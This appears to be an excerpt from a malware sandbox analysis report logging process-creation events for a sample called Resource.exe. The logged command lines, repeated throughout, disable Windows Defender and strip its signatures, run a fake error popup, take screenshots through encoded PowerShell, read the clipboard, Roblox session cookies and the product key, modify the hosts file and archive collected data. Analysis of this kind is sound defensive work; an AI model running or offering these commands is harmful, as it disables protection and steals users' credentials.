Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior

Modifies the hosts file

Source: C:\Users\user\Desktop\Resource.exe

File written: C:\Windows\System32\drivers\etc\hosts

Jump to behavior

Removes signatures from Windows Defender

Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All	Jump to behavior

Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Users\user\Desktop\Resource.exe "C:\Users\user\Desktop\Resource.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe a -r -hp"mined" "C:\Users\user\AppData\Local\Temp\rEC04.zip" *"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"	Jump to behavior
Source: C:\Users\user\Desktop\Resource.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\Resource.exe'	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Cannot run with your windows version', 0, 'Error', 0+16);close()"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +h +s "C:\Users\user\Desktop\Resource.exe"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? ? .scr'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\erdw4v5g\erdw4v5g.cmdline"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\getmac.exe getmac
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESB5E2.tmp" "c:\Users\user\AppData\Local\Temp\erdw4v5g\CSCD6B8C8C98EAE4A66B46BEA9E417699A.TMP"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tree.com tree /A /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe C:\Users\user\AppData\Local\Temp\_MEI66322\rar.exe a -r -hp"mined" "C:\Users\user\AppData\Local\Temp\rEC04.zip" *
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
